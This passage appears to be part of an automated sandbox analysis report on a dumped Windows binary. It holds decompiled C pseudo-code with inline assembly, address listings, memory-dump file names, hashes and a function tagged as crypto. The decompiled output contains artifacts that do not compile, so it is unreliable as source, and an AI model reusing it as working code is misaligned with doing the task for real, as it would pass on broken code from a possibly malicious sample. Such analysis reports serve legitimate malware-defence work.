												L6EA19510(_t1233 + 0x170);
												L6EA19510(_t1233 + 0x160);
												L6EA19510(_t1233 + 0x228);
												E6E9FE2F0(_t786, _t1233 + 0x1bc, _t1208);
												L6EA19510(_t1233 + 0x1ac);
												__eflags = 0;
												return 0;
											}
										}
										goto L82;
									}
									 *(_t1233 + 0x194) = _t786;
									_t787 = 0;
									__eflags = 0;
									 *(_t1233 + 0x198) = _t1186;
									_t1118 =  *(_t1233 + 0x194);
									_t574 = _t1186;
									while(1) {
										asm("movq xmm0, [esp+0x200]");
										asm("movq [esp], xmm0");
										asm("pxor xmm1, xmm1");
										 *((intOrPtr*)(_t1233 + 8)) = 5;
										 *(_t1233 + 0xc) = _t574;
										 *(_t1233 + 0x10) = _t1118;
										 *((intOrPtr*)(_t1233 + 0x14)) =  *((intOrPtr*)(_t1233 + 0x1a4));
										 *((intOrPtr*)(_t1233 + 0x18)) =  *((intOrPtr*)(_t1233 + 0x218));
										_t1187 =  *((intOrPtr*)(_t1233 + 0x21c));
										 *((intOrPtr*)(_t1233 + 0x1c)) =  *((intOrPtr*)(_t1233 + 0x21c));
										_t1152 =  *((intOrPtr*)(_t1233 + 0x220));
										 *((intOrPtr*)(_t1233 + 0x20)) =  *((intOrPtr*)(_t1233 + 0x220));
										asm("movq [esp+0x24], xmm1");
										asm("movq [esp+0x2c], xmm1");
										_t576 = E6EA204B0( *((intOrPtr*)(_t1233 + 0x220)));
										__eflags = _t576;
										if(_t576 == 0) {
											break;
										}
										_t1188 = 0;
										__eflags = 0;
										while(1) {
											_t574 = E6E9FCA10(_t1233 + 0x1a8, __eflags);
											__eflags = _t574 | _t1118;
											if((_t574 | _t1118) != 0) {
												break;
											}
											__eflags = _t1188 - 0x20;
											if(_t1188 == 0x20) {
												_t574 = 0xffffffff;
												_t1118 = 0xffffffff;
											} else {
												E6EA022A0(0x5dc, _t1118);
												_t1188 = _t1188 + 1;
												continue;
											}
											break;
										}
										_t1190 = _t1118 - 0xffffffff;
										_t1155 = _t574 - 0xffffffff | _t1118 - 0xffffffff;
										__eflags = _t574 - 0xffffffff | _t1118 - 0xffffffff;
										if((_t574 - 0xffffffff | _t1118 - 0xffffffff) == 0) {
											L6EA19510(_t1233 + 0x40);
											E6E9FE230(_t1233 + 0x128);
											L6EA22530(_t787, _t1233 + 0x110, _t1118, _t1155, _t1190);
											L6EA19510(_t1233 + 0x180);
											L6EA19510(_t1233 + 0x170);
											L6EA19510(_t1233 + 0x160);
											L6EA19510(_t1233 + 0x228);
											E6E9FE2F0(_t787, _t1233 + 0x1bc, _t1208);
											L6EA19510(_t1233 + 0x1ac);
											__eflags = 0;
											return 0;
										} else {
											_t787 = _t787 + 1;
											__eflags = _t787 - 0xa;
											if(_t787 != 0xa) {
												continue;
											} else {
												L6EA19510(_t1233 + 0x40);
												E6E9FE230(_t1233 + 0x128);
												L6EA22530(_t787, _t1233 + 0x110, _t1118, _t1155, _t1190);
												L6EA19510(_t1233 + 0x180);
												L6EA19510(_t1233 + 0x170);
												L6EA19510(_t1233 + 0x160);
												L6EA19510(_t1233 + 0x228);
												E6E9FE2F0(_t787, _t1233 + 0x1bc, _t1208);
												L6EA19510(_t1233 + 0x1ac);
												__eflags = 0;
												return 0;
											}
										}
										goto L82;
									}
									_push(0);
									_t1119 =  *(_t1233 + 0x24c);
									__eflags = _t1119;
									_t1120 =  !=  ? _t1119 + 0xc : _t1119;
									_push( !=  ? _t1119 + 0xc : _t1119);
									_t789 = E6EA21A80( !=  ? _t1119 + 0xc : _t1119, _t1119, _t1233 + 0x11c, 0x2710);
									_t1242 = _t1233 + 0x10;
									L6EA19510(_t1233 + 0x50);
									E6E9FE230(_t1233 + 0x138);
									L6EA22530(_t789, _t1233 + 0x120,  !=  ? _t1119 + 0xc : _t1119, _t1152, _t1187);
									L6EA19510(_t1233 + 0x190);
									L6EA19510(_t1242 + 0x170);
									L6EA19510(_t1242 + 0x160);
									L6EA19510(_t1242 + 0x228);
									E6E9FE2F0(_t789, _t1242 + 0x1bc, _t1208);
									L6EA19510(_t1242 + 0x1ac);
									__eflags = _t789 - 1;
									_t378 = _t789 - 1 > 0;
									__eflags = _t378;
									return 0 | _t378;
								} else {
									E6E9FE230(_t1233 + 0x128);
									L6EA22530(_t784, _t1233 + 0x110, _t1113, _t1149, _t1185);
									L6EA19510(_t1233 + 0x180);
									L6EA19510(_t1233 + 0x170);
									L6EA19510(_t1233 + 0x160);
									L6EA19510(_t1233 + 0x228);
									E6E9FE2F0(_t784, _t1233 + 0x1bc, _t1208);
									L6EA19510(_t1233 + 0x1ac);
									__eflags = 0;
									return 0;
								}
							}
						}
					}
				}
				L82:
			}

0x6e9fb262
0x6e9fb269
0x6e9fb282
0x6e9fb290
0x6e9fb2a7
0x6e9fb2ac
0x6e9fb2bb
0x6e9fb2c2
0x6e9fb2d2
0x6e9fb2d9
0x6e9fb2ee
0x6e9fb2f3
0x6e9fb2fa
0x6e9fb30a
0x6e9fb320
0x6e9fb32c
0x6e9fb338
0x6e9fb344
0x6e9fb350
0x6e9fb35c
0x6e9fb36f
0x6e9fb372
0x6e9fb37e
0x6e9fb383
0x6e9fb38b
0x6e9fb399
0x6e9fb39a
0x6e9fb39b
0x6e9fb3a4
0x6e9fb3ab
0x6e9fb3b5
0x6e9fb3bf
0x6e9fb3c9
0x6e9fb3d5
0x6e9fb3d6
0x6e9fb3dd
0x6e9fb3e1
0x6e9fb3e5
0x6e9fb3f3
0x6e9fb401
0x6e9fb402
0x6e9fb40a
0x6e9fb40e
0x6e9fb412
0x6e9fb420
0x6e9fb433
0x6e9fb434
0x6e9fb438
0x6e9fb43c
0x6e9fb440
0x6e9fb460
0x6e9fb46c
0x6e9fb476
0x6e9fb47c
0x6e9fb482
0x6e9fb487
0x6e9fb496
0x6e9fb49a
0x6e9fb4b0
0x6e9fb4cc
0x6e9fb4d1
0x6e9fb4dd
0x6e9fb4e1
0x6e9fb4e4
0x6e9fb4ec
0x6e9fb502
0x6e9fb51e
0x6e9fb523
0x6e9fb52f
0x6e9fb533
0x6e9fb536
0x6e9fb53e
0x6e9fb554
0x6e9fb570
0x6e9fb575
0x6e9fb581
0x6e9fb585
0x6e9fb588
0x6e9fb590
0x6e9fb5a6
0x6e9fb5c2
0x6e9fb5c7
0x6e9fb5d3
0x6e9fb5d7
0x6e9fb5da
0x6e9fb5e2
0x6e9fb5f8
0x6e9fb614
0x6e9fb619
0x6e9fb625
0x6e9fb629
0x6e9fb62c
0x6e9fb634
0x6e9fb64a
0x6e9fb666
0x6e9fb66b
0x6e9fb677
0x6e9fb67b
0x6e9fb67e
0x6e9fb686
0x6e9fb69c
0x6e9fb6b8
0x6e9fb6bd
0x6e9fb6c9
0x6e9fb6cd
0x6e9fb6d0
0x6e9fb6d8
0x6e9fb6ee
0x6e9fb70a
0x6e9fb70f
0x6e9fb714
0x6e9fb720
0x6e9fb723
0x6e9fb731
0x6e9fb736
0x6e9fb73b
0x6e9fb74a
0x6e9fb74f
0x6e9fb754
0x6e9fb763
0x6e9fb768
0x6e9fb76d
0x6e9fb77f
0x6e9fb784
0x6e9fb789
0x6e9fb79b
0x6e9fb7a0
0x6e9fb7a5
0x6e9fb7b7
0x6e9fb7bc
0x6e9fb7c1
0x6e9fb7d3
0x6e9fb7d8
0x6e9fb7dd
0x6e9fb7ef
0x6e9fb7f4
0x6e9fb800
0x6e9fb808
0x6e9fb80d
0x6e9fb814
0x6e9fb824
0x6e9fb826
0x6e9fb828
0x6e9fc829
0x6e9fc835
0x6e9fc841
0x6e9fc84d
0x6e9fc859
0x6e9fc865
0x6e9fc871
0x6e9fc87d
0x6e9fc882
0x6e9fc890
0x6e9fb82e
0x6e9fb835
0x6e9fb835
0x6e9fb83c
0x6e9fba4c
0x6e9fba50
0x6e9fba50
0x6e9fba52
0x6e9fba56
0x6e9fba56
0x6e9fba5f
0x6e9fba71
0x6e9fba85
0x6e9fba93
0x6e9fbaa6
0x6e9fbab2
0x6e9fbabe
0x6e9fbac3
0x6e9fbad1
0x6e9fbad7
0x6e9fbadc
0x6e9fbade
0x6e9fbb91
0x6e9fbb91
0x6e9fbb9a
0x6e9fbb9f
0x6e9fbba3
0x6e9fbbb2
0x6e9fbbbd
0x6e9fbbc6
0x6e9fbbca
0x6e9fbbd0
0x6e9fbbd7
0x6e9fbbdb
0x6e9fbbe2
0x6e9fbbe6
0x6e9fbbec
0x6e9fbbf2
0x6e9fbbf7
0x6e9fbbf9
0x6e9fbc7d
0x6e9fbc89
0x6e9fbc9d
0x6e9fbca4
0x6e9fbcb0
0x6e9fbcb7
0x6e9fc815
0x6e9fc819
0x00000000
0x6e9fbcbd
0x6e9fbcc4
0x6e9fbcc9
0x6e9fbcd0
0x6e9fbce0
0x6e9fbce2
0x6e9fbce4
0x6e9fc7ab
0x6e9fc7b7
0x6e9fc7c3
0x6e9fc7cf
0x6e9fc7db
0x6e9fc7e7
0x6e9fc7f3
0x6e9fc7ff
0x6e9fc804
0x6e9fc812
0x00000000
0x00000000
0x00000000
0x6e9fbce4
0x00000000
0x00000000
0x00000000
0x6e9fbae4
0x6e9fbae4
0x6e9fbae6
0x6e9fbaea
0x6e9fbaec
0x6e9fbaee
0x6e9fbaf6
0x6e9fbafb
0x6e9fbb04
0x6e9fbb09
0x6e9fbb18
0x6e9fbb23
0x6e9fbb2c
0x6e9fbb30
0x6e9fbb33
0x6e9fbb39
0x6e9fbb41
0x6e9fbb45
0x6e9fbb49
0x6e9fbb4d
0x6e9fbb55
0x6e9fbb5b
0x6e9fbb60
0x6e9fbb62
0x00000000
0x00000000
0x6e9fbb6d
0x6e9fbb72
0x6e9fbb7c
0x6e9fbb7f
0x6e9fbb80
0x6e9fbb85
0x6e9fbb87
0x00000000
0x6e9fbb8d
0x6e9fbb8d
0x00000000
0x6e9fbb8d
0x00000000
0x6e9fbb87
0x6e9fbbfb
0x6e9fbc02
0x6e9fbc0e
0x6e9fbc1a
0x6e9fbc26
0x6e9fbc32
0x6e9fbc3e
0x6e9fbc4a
0x6e9fbc56
0x6e9fbc62
0x6e9fbc67
0x6e9fbc75
0x6e9fbc75
0x00000000
0x6e9fbcea
0x6e9fbcea
0x6e9fbceb
0x6e9fbceb
0x6e9fbcfb
0x6e9fbd07
0x6e9fbd13
0x6e9fbd1f
0x6e9fbd2b
0x6e9fbd37
0x6e9fbd43
0x6e9fbd4f
0x6e9fbd54
0x6e9fbd62
0x6e9fb842
0x6e9fb842
0x6e9fb842
0x6e9fb846
0x6e9fb846
0x6e9fb848
0x6e9fb84c
0x6e9fb853
0x6e9fb85a
0x6e9fb85a
0x6e9fb863
0x6e9fb86c
0x6e9fb870
0x6e9fb875
0x6e9fb87d
0x6e9fb881
0x6e9fb885
0x6e9fb892
0x6e9fb89d
0x6e9fb8a5
0x6e9fb8a9
0x6e9fb8af
0x6e9fb8b5
0x6e9fb8ba
0x6e9fb8bc
0x00000000
0x00000000
0x6e9fb8ce
0x6e9fb8d0
0x6e9fb8dd
0x6e9fb8df
0x6e9fb8e1
0x6e9fbd6c
0x6e9fbd78
0x6e9fbd84
0x6e9fbd90
0x6e9fbd9c
0x6e9fbda8
0x6e9fbdb4
0x6e9fbdc0
0x6e9fbdc5
0x6e9fbdd3
0x6e9fb8e7
0x6e9fb8e7
0x6e9fb8e8
0x6e9fb8eb
0x00000000
0x6e9fb8f1
0x6e9fb8f8
0x6e9fb904
0x6e9fb910
0x6e9fb91c
0x6e9fb928
0x6e9fb934
0x6e9fb940
0x6e9fb94c
0x6e9fb951
0x6e9fb95f
0x6e9fb95f
0x6e9fb8eb
0x00000000
0x6e9fb8e1
0x6e9fb962
0x6e9fb969
0x6e9fb969
0x6e9fb96b
0x6e9fb972
0x6e9fb979
0x6e9fb980
0x6e9fb980
0x6e9fb985
0x6e9fb98c
0x6e9fb993
0x6e9fb994
0x6e9fb99c
0x6e9fb9a8
0x6e9fb9aa
0x00000000
0x00000000
0x6e9fb9bc
0x6e9fb9be
0x6e9fb9cb
0x6e9fb9cd
0x6e9fb9cf
0x6e9fbddd
0x6e9fbde9
0x6e9fbdf5
0x6e9fbe01
0x6e9fbe0d
0x6e9fbe19
0x6e9fbe25
0x6e9fbe31
0x6e9fbe36
0x6e9fbe44
0x6e9fb9d5
0x6e9fb9d5
0x6e9fb9d6
0x6e9fb9d9
0x00000000
0x6e9fb9db
0x6e9fb9e2
0x6e9fb9ee
0x6e9fb9fa
0x6e9fba06
0x6e9fba12
0x6e9fba1e
0x6e9fba2a
0x6e9fba36
0x6e9fba3b
0x6e9fba49
0x6e9fba49
0x6e9fb9d9
0x00000000
0x6e9fb9cf
0x6e9fbe47
0x6e9fbe58
0x6e9fbe5c
0x6e9fbe5d
0x6e9fbe61
0x6e9fbe65
0x6e9fbe6b
0x6e9fbe6f
0x6e9fbe75
0x6e9fbe79
0x6e9fbe7d
0x6e9fbe82
0x6e9fbe89
0x6e9fbe8c
0x6e9fbe91
0x6e9fbe99
0x6e9fbe9d
0x6e9fbea2
0x6e9fbea4
0x6e9fc73a
0x6e9fc746
0x6e9fc752
0x6e9fc75e
0x6e9fc76a
0x6e9fc776
0x6e9fc782
0x6e9fc78e
0x6e9fc793
0x6e9fc7a1
0x6e9fbeaa
0x6e9fbeaa
0x6e9fbeac
0x6e9fbeb0
0x6e9fbeb4
0x6e9fbebb
0x6e9fbebf
0x6e9fbec6
0x6e9fbec6
0x6e9fbec6
0x6e9fbecf
0x6e9fbed4
0x6e9fbed8
0x6e9fbee0
0x6e9fbeeb
0x6e9fbef4
0x6e9fbef8
0x6e9fbefe
0x6e9fbf02
0x6e9fbf06
0x6e9fbf0c
0x6e9fbf12
0x6e9fbf18
0x6e9fbf1d
0x6e9fbf1f
0x00000000
0x00000000
0x6e9fbf21
0x6e9fbf21
0x6e9fbf23
0x6e9fbf2a
0x6e9fbf2f
0x6e9fbf33
0x6e9fbf33
0x6e9fbf35
0x00000000
0x00000000
0x6e9fbf3b
0x6e9fbf3e
0x6e9fbfde
0x6e9fbfe3
0x6e9fbf44
0x6e9fbf49
0x6e9fbf4e
0x00000000
0x6e9fbf4e
0x6e9fbfea
0x6e9fbffc
0x6e9fbffe
0x6e9fc08e
0x6e9fc09a
0x6e9fc0a6
0x6e9fc0b2
0x6e9fc0be
0x6e9fc0ca
0x6e9fc0d6
0x6e9fc0e2
0x6e9fc0e7
0x6e9fc0f5
0x6e9fc004
0x6e9fc008
0x6e9fc009
0x6e9fc00d
0x6e9fc010
0x00000000
0x6e9fc016
0x6e9fc01d
0x6e9fc029
0x6e9fc035
0x6e9fc041
0x6e9fc04d
0x6e9fc059
0x6e9fc065
0x6e9fc071
0x6e9fc076
0x6e9fc084
0x6e9fc084
0x6e9fc010
0x00000000
0x6e9fbffe
0x6e9fc0f8
0x6e9fc0ff
0x00000000
0x6e9fc0ff
0x6e9fbf51
0x6e9fbf58
0x6e9fbf5a
0x6e9fbf61
0x6e9fbf68
0x6e9fbf6c
0x6e9fbf75
0x6e9fbf7a
0x6e9fbf88
0x6e9fbf89
0x6e9fbf8d
0x6e9fbf94
0x6e9fbf95
0x6e9fbf96
0x6e9fbfa4
0x6e9fbfa6
0x00000000
0x00000000
0x6e9fbfac
0x6e9fbfac
0x6e9fbfae
0x6e9fbfba
0x6e9fbfbc
0x6e9fbfc0
0x6e9fbfc2
0x00000000
0x00000000
0x6e9fbfc8
0x6e9fbfcb
0x6e9fc106
0x6e9fc10b
0x6e9fbfd1
0x6e9fbfd6
0x6e9fbfdb
0x00000000
0x6e9fbfdb
0x00000000
0x6e9fbfcb
0x6e9fc118
0x6e9fc11a
0x6e9fc11c
0x6e9fc1ac
0x6e9fc1b8
0x6e9fc1c4
0x6e9fc1d0
0x6e9fc1dc
0x6e9fc1e8
0x6e9fc1f4
0x6e9fc200
0x6e9fc205
0x6e9fc213
0x6e9fc122
0x6e9fc126
0x6e9fc127
0x6e9fc12b
0x6e9fc12e
0x00000000
0x6e9fc134
0x6e9fc13b
0x6e9fc147
0x6e9fc153
0x6e9fc15f
0x6e9fc16b
0x6e9fc177
0x6e9fc183
0x6e9fc18f
0x6e9fc194
0x6e9fc1a2
0x6e9fc1a2
0x6e9fc12e
0x00000000
0x6e9fc11c
0x6e9fc216
0x6e9fc21d
0x6e9fc221
0x6e9fc227
0x6e9fc231
0x6e9fc236
0x6e9fc23a
0x6e9fc23f
0x6e9fc241
0x6e9fc2b4
0x6e9fc2ba
0x6e9fc2bf
0x6e9fc2cf
0x6e9fc2e8
0x6e9fc2f1
0x6e9fc2fd
0x6e9fc309
0x6e9fc311
0x6e9fc314
0x6e9fc317
0x6e9fc328
0x6e9fc32d
0x6e9fc32f
0x6e9fc333
0x6e9fc33a
0x6e9fc341
0x6e9fc347
0x6e9fc357
0x6e9fc358
0x6e9fc35f
0x6e9fc366
0x6e9fc367
0x6e9fc368
0x6e9fc371
0x6e9fc376
0x6e9fc378
0x00000000
0x00000000
0x6e9fc37e
0x6e9fc37e
0x6e9fc380
0x6e9fc38c
0x6e9fc38e
0x6e9fc392
0x6e9fc394
0x00000000
0x00000000
0x6e9fc396
0x6e9fc399
0x6e9fc3a8
0x6e9fc3ad
0x6e9fc39b
0x6e9fc3a0
0x6e9fc3a5
0x00000000
0x6e9fc3a5
0x00000000
0x6e9fc399
0x6e9fc3ba
0x6e9fc3bc
0x6e9fc3be
0x6e9fc454
0x6e9fc460
0x6e9fc46c
0x6e9fc478
0x6e9fc484
0x6e9fc490
0x6e9fc49c
0x6e9fc4a8
0x6e9fc4b4
0x6e9fc4b9
0x6e9fc4c7
0x6e9fc3c4
0x6e9fc3c8
0x6e9fc3c9
0x6e9fc3cd
0x6e9fc3d0
0x00000000
0x6e9fc3d6
0x6e9fc3da
0x6e9fc3e6
0x6e9fc3f2
0x6e9fc3fe
0x6e9fc40a
0x6e9fc416
0x6e9fc422
0x6e9fc42e
0x6e9fc43a
0x6e9fc43f
0x6e9fc44d
0x6e9fc44d
0x6e9fc3d0
0x00000000
0x6e9fc3be
0x6e9fc4ca
0x6e9fc4d1
0x6e9fc4d1
0x6e9fc4d3
0x6e9fc4da
0x6e9fc4e1
0x6e9fc4e3
0x6e9fc4e3
0x6e9fc4ec
0x6e9fc4f1
0x6e9fc4f5
0x6e9fc4fd
0x6e9fc501
0x6e9fc50c
0x6e9fc517
0x6e9fc51b
0x6e9fc522
0x6e9fc526
0x6e9fc52d
0x6e9fc531
0x6e9fc537
0x6e9fc53d
0x6e9fc542
0x6e9fc544
0x00000000
0x00000000
0x6e9fc5f3
0x6e9fc5f3
0x6e9fc5f5
0x6e9fc5fc
0x6e9fc603
0x6e9fc605
0x00000000
0x00000000
0x6e9fc607
0x6e9fc60a
0x6e9fc619
0x6e9fc61e
0x6e9fc60c
0x6e9fc611
0x6e9fc616
0x00000000
0x6e9fc616
0x00000000
0x6e9fc60a
0x6e9fc62b
0x6e9fc62d
0x6e9fc62d
0x6e9fc62f
0x6e9fc6bd
0x6e9fc6c9
0x6e9fc6d5
0x6e9fc6e1
0x6e9fc6ed
0x6e9fc6f9
0x6e9fc705
0x6e9fc711
0x6e9fc71d
0x6e9fc722
0x6e9fc730
0x6e9fc635
0x6e9fc635
0x6e9fc636
0x6e9fc639
0x00000000
0x6e9fc63f
0x6e9fc643
0x6e9fc64f
0x6e9fc65b
0x6e9fc667
0x6e9fc673
0x6e9fc67f
0x6e9fc68b
0x6e9fc697
0x6e9fc6a3
0x6e9fc6a8
0x6e9fc6b6
0x6e9fc6b6
0x6e9fc639
0x00000000
0x6e9fc62f
0x6e9fc54a
0x6e9fc54c
0x6e9fc553
0x6e9fc558
0x6e9fc55b
0x6e9fc56e
0x6e9fc570
0x6e9fc577
0x6e9fc583
0x6e9fc58f
0x6e9fc59b
0x6e9fc5a7
0x6e9fc5b3
0x6e9fc5bf
0x6e9fc5cb
0x6e9fc5d7
0x6e9fc5de
0x6e9fc5e1
0x6e9fc5e1
0x6e9fc5f0
0x6e9fc243
0x6e9fc24a
0x6e9fc256
0x6e9fc262
0x6e9fc26e
0x6e9fc27a
0x6e9fc286
0x6e9fc292
0x6e9fc29e
0x6e9fc2a3
0x6e9fc2b1
0x6e9fc2b1
0x6e9fc241
0x6e9fbea4
0x6e9fb83c
0x6e9fb828
0x00000000

Strings

ZFhj, xrefs: 6E9FB588

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ZFhj
API String ID: 0-4053837889
Opcode ID: dddd0a31502174045f01363d61365a7623dac5fe7b7864a4b65db648282aee5c
Instruction ID: 01601f5ffaa8fd6742103ab9db7962dea7a8a36c1362141ee9e72898852255a4
Opcode Fuzzy Hash: dddd0a31502174045f01363d61365a7623dac5fe7b7864a4b65db648282aee5c
Instruction Fuzzy Hash: C6B21E316283809BD374DFB4DA90AEEB3E8AFD5324F504E2DD49953190EF309989CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6EA13EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6EA13EC0(signed int __ecx) {
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t368;
				unsigned int _t371;
				void* _t376;
				signed int* _t377;
				char* _t378;
				char _t381;
				signed int _t382;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t396;
				char* _t397;
				char _t400;
				char _t403;
				signed int _t404;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				void* _t413;
				char* _t416;
				signed int _t418;
				unsigned int _t424;
				signed int _t425;
				char* _t431;
				signed int _t436;
				unsigned int _t442;
				char* _t445;
				void* _t447;
				char _t449;
				signed int _t450;
				signed int _t451;
				char* _t463;
				char _t477;
				char _t479;
				char _t481;
				char _t482;
				signed int _t483;
				signed int _t484;
				char _t491;
				signed int _t492;
				void* _t503;
				signed int _t508;
				unsigned int _t509;
				signed int _t511;
				signed int _t512;
				signed int _t520;
				char* _t521;
				char* _t522;
				char* _t523;
				signed int _t524;
				signed int _t527;
				char* _t535;
				signed int _t537;
				unsigned int _t543;
				signed int _t545;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				signed int _t551;
				signed int _t552;
				unsigned int _t556;
				void* _t565;
				signed int _t566;
				char* _t568;
				char _t569;
				char _t570;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				unsigned int _t575;
				char* _t576;
				char _t577;
				char _t578;
				char* _t583;
				char _t584;
				char _t585;
				signed int _t586;
				unsigned int _t592;
				void* _t595;
				signed int _t597;
				signed int _t600;
				char _t602;
				void* _t603;
				unsigned int _t604;
				signed int _t605;
				unsigned int _t610;
				signed int _t612;
				signed int _t614;
				char* _t615;
				char _t616;
				char _t617;
				char _t620;
				signed int _t621;
				void* _t624;
				signed int _t626;
				char _t629;
				signed int _t630;
				signed int _t636;
				signed int _t641;
				char* _t642;
				char _t644;
				signed int _t646;
				char _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t655;
				signed int _t658;
				char* _t659;
				void* _t660;
				void* _t665;
				intOrPtr _t667;
				signed int _t672;
				signed int _t673;
				unsigned int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				unsigned int* _t683;
				signed int _t685;
				signed int _t686;
				void* _t688;
				signed int _t689;
				signed int _t693;
				signed int _t694;
				char* _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t700;
				unsigned int _t702;
				signed int _t704;
				intOrPtr* _t705;
				signed int _t707;
				signed int _t714;
				void* _t720;
				signed int _t721;
				void* _t723;
				void* _t727;

				_t723 = (_t721 & 0xfffffff0) - 0x44;
				_t505 = __ecx;
				_t727 =  *__ecx;
				if(_t727 == 0) {
					return __ecx;
				} else {
					if(_t727 <= 0) {
						_v48 = 0;
						_t604 = 0;
						if( &_v52 == __ecx) {
							goto L288;
						} else {
							goto L287;
						}
					} else {
						_v64 = 0;
						asm("pxor xmm0, xmm0");
						_v40 = __ecx;
						do {
							_t410 = _v64 + 1;
							_t620 =  *0x6ea2a24c; // 0xa0d0920
							_t550 =  *0x6ea2a250; // 0x0
							_v64 = _t410;
							_v36 = _t620;
							_v32 = _t550;
							_t621 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t410 * 4 - 4));
							if(_t621 == 0) {
								_t680 = 0;
								_t412 = 0;
							} else {
								_t505 = _t621 & 0x0000000f;
								if(_t505 == 0) {
									L8:
									asm("pxor xmm1, xmm1");
									_t503 =  ~( ~_t505 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+ebx]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ecx, xmm0");
										if(_t550 != 0) {
											break;
										}
										_t505 = _t505 + 0x10;
										if(_t505 < _t503) {
											continue;
										} else {
											if(_t503 >= 0x7fffffff) {
												L14:
												_t412 = 0x7fffffff;
												goto L15;
											} else {
												while( *((char*)(_t503 + _t621)) != 0) {
													_t503 = _t503 + 1;
													if(_t503 < 0x7fffffff) {
														continue;
													} else {
														goto L14;
													}
													goto L20;
												}
												goto L295;
											}
										}
										goto L20;
									}
									asm("bsf eax, ecx");
									_t412 = _t503 + _t505;
									goto L295;
								} else {
									_t412 = 0;
									_t505 =  ~_t505 + 0x10;
									while( *((char*)(_t412 + _t621)) != 0) {
										_t412 = _t412 + 1;
										if(_t412 < _t505) {
											continue;
										} else {
											goto L8;
										}
										goto L20;
									}
									L295:
									if(_t412 > 0) {
										L15:
										_t505 = _v36;
										_t680 = 0;
										while(_t505 != 0) {
											while(1) {
												_t720 = _t720 + 1;
												if(_t603 ==  *((intOrPtr*)(_t723 + _t720 + 0x2f))) {
													break;
												}
												if( *((char*)(_t723 + _t720 + 0x30)) != 0) {
													continue;
												}
												goto L20;
											}
											_t680 = _t680 + 1;
											if(_t680 < _t412) {
												continue;
											} else {
												goto L20;
											}
											goto L301;
										}
									} else {
										_t680 = 0;
									}
								}
							}
							L20:
							_t413 = _t412 - 1;
							_t700 = _t412 - _t680;
							if(_t413 >= _t680) {
								_v60 = 0;
								_t505 = _t413 - _t680 + 1;
								_v56 = _t680;
								_t602 = _v36;
								_t689 = _v60;
								_v48 = _t621;
								_v52 = _t505;
								while(_t602 != 0) {
									_t667 =  *((intOrPtr*)(_t413 + _v48));
									while(1) {
										_t505 = 1;
										if(_t667 ==  *((intOrPtr*)(_t723 + 0x30))) {
											break;
										}
										if( *((char*)(_t723 + 0x31)) != 0) {
											continue;
										}
										goto L26;
									}
									_t689 = _t689 + 1;
									_t413 = _t413 - 1;
									_t700 = _t700 - 1;
									if(_t689 < _v52) {
										continue;
									} else {
										break;
									}
									goto L301;
								}
								L26:
								_t621 = _v48;
								_t680 = _v56;
							}
							if(_t700 == 0) {
								L66:
								_push(0x40);
								_t505 = E6EA01030();
								_t723 = _t723 + 4;
								 *_t505 = 0;
							} else {
								if(_t621 == 0) {
									_t483 = 0;
								} else {
									_t600 = _t621 & 0x0000000f;
									if(_t600 == 0) {
										L33:
										asm("pxor xmm1, xmm1");
										_t483 =  ~( ~_t600 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [edx+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ebx, xmm0");
											if(_t505 != 0) {
												break;
											}
											_t600 = _t600 + 0x10;
											if(_t600 < _t483) {
												continue;
											} else {
												if(_t483 >= 0x7fffffff) {
													L39:
													_t483 = 0x7fffffff;
												} else {
													while( *((char*)(_t483 + _t621)) != 0) {
														_t483 = _t483 + 1;
														if(_t483 < 0x7fffffff) {
															continue;
														} else {
															goto L39;
														}
														goto L40;
													}
												}
											}
											goto L40;
										}
										asm("bsf eax, ebx");
										_t483 = _t483 + _t600;
									} else {
										_t483 = 0;
										_t600 =  ~_t600 + 0x10;
										while( *((char*)(_t483 + _t621)) != 0) {
											_t483 = _t483 + 1;
											if(_t483 < _t600) {
												continue;
											} else {
												goto L33;
											}
											goto L40;
										}
									}
								}
								L40:
								_t687 =  <=  ? 0 : _t680;
								_t688 =  <  ? _t483 :  <=  ? 0 : _t680;
								_t484 = _t483 - _t688;
								if(_t700 < 0 || _t700 > _t484) {
									_t700 = _t484;
								}
								if(_t688 + _t621 == 0 ||  *(_t621 + _t688) == 0) {
									goto L66;
								} else {
									if(_t700 == 0) {
										_t492 = _t621 + _t688;
										_t597 = _t492 & 0x0000000f;
										if(_t597 == 0) {
											L50:
											asm("pxor xmm1, xmm1");
											_t700 =  ~( ~_t597 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm0, [eax+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb ebx, xmm0");
												if(_t505 != 0) {
													break;
												}
												_t597 = _t597 + 0x10;
												if(_t597 < _t700) {
													continue;
												} else {
													if(_t700 >= 0x7fffffff) {
														L56:
														_t700 = 0x7fffffff;
													} else {
														while( *((char*)(_t700 + _t492)) != 0) {
															_t700 = _t700 + 1;
															if(_t700 < 0x7fffffff) {
																continue;
															} else {
																goto L56;
															}
															goto L57;
														}
													}
												}
